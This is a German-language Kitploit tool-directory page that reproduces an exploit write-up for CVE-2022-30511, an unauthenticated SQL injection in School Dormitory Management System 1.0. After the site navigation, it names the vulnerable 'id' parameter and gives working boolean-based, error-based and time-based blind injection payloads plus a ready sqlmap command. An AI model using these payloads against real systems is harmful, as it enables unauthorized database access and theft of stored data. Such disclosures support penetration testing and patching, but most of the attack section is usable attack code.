Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-30511 — School Dormitory Management System 1.0 - Unauthentifizierte SQL-Injection | Kitploit
Tools/GitHubGitHub/bigzooooz/cve-2022-30511
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHubbigzooooz/cve-2022-30511

CVE-2022-30511

School Dormitory Management System 1.0 - Unauthentifizierte SQL-Injection

Repository anzeigen
11vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-30511

School Dormitory Management System 1.0 - Nicht authentifizierte SQL-Injection

Exploit-Titel: School Dormitory Management System 1.0 - Nicht authentifizierte SQL-Injection

Datum: 2022-05-25

CVE: CVE-2022-30511

Exploit-Autor: Abdulaziz Saad (@b4zb0z)

Hersteller-Homepage: https://www.sourcecodester.com/

Software-Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

Version: 1.0

Getestet auf: LAMP, Ubuntu


[#] Ort der Schwachstelle: $_GET['id'] in /dms/admin/accounts/view_details.php:4

Parameter: id (GET) Typ: boolean-based blind Titel: AND boolean-based blind - WHERE- oder HAVING-Klausel Payload: page=accounts/view_details&id=2' AND 8853=8853 AND 'kujz'='kujz

root@kitploit:~
Typ: error-based
root@kitploit:~
Titel: MySQL >= 5.0 AND error-based - WHERE-, HAVING-, ORDER BY- oder GROUP BY-Klausel (FLOOR)
Payload: page=accounts/view_details&id=2' AND (SELECT 8739 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8739=8739,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'fkLf'='fkLf
root@kitploit:~
Typ: time-based blind
root@kitploit:~
Titel: MySQL >= 5.0.12 AND time-based blind (Abfrage SLEEP)
Payload: page=accounts/view_details&id=2' AND (SELECT 7339 FROM (SELECT(SLEEP(5)))Dkxx) AND 'UZCm'='UZCm

[#] Ausnutzung mit SQLMAP: sqlmap -u "http://localhost/dms/admin/?page=accounts/view_details&id=2" --dbms=mysql

Tool herunterladen